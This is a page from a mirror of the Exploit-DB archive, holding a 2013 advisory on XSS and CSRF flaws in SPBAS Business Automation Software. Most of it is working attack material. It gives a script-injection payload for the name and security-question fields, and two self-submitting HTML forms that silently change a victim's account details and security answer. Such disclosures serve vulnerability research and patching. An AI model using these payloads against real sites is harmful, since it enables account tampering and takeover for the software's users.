bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/26244.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

58 lines
No EOL
1.7 KiB
Text
Raw Blame History

# SPBAS Business Automation Software- XSS & CSRF Vulnerability
# Date: 16 June 2013
# Author: Christy Philip Mathew - www.offcon.org
# Vendor or Software Link: http://www.spbas.com
# Version: 2012
*1.XSS Vulnerability*
(a) Client Area -> My Info -> Update the first name and last name to
john"><img src=x onerror=prompt(0);>
(b) Update the security question to
john"><img src=x onerror=prompt(0);>
*2.Cross Site Request Forgery*
(a) Change Customer Information
<html>
<body onload=document.forms[0].submit();>
<form action="http://website.com/customers/index.php" method="POST">
<input type="hidden" name="task" value="my_account" />
<input type="hidden" name="tab" value="my_info" />
<input type="hidden" name="update_my_info" value="y" />
<input type="hidden" name="first_name" value="hacked" />
<input type="hidden" name="last_name" value="hacked" />
<input type="hidden" name="username" value="hacked" />
<input type="hidden" name="form_submission"
value="Save Changes" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
(b) Change Security Question Answer
<html>
<body onload=document.forms[0].submit();>
<form action="http://website.com/customers/index.php" method="POST">
<input type="hidden" name="task" value="my_account" />
<input type="hidden" name="tab" value="security_question" />
<input type="hidden" name="change_security_question"
value="y" />
<input type="hidden" name="question" value="1" />
<input type="hidden" name="answer" value="test" />
<input type="hidden" name="form_submission"
value="Save Changes" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink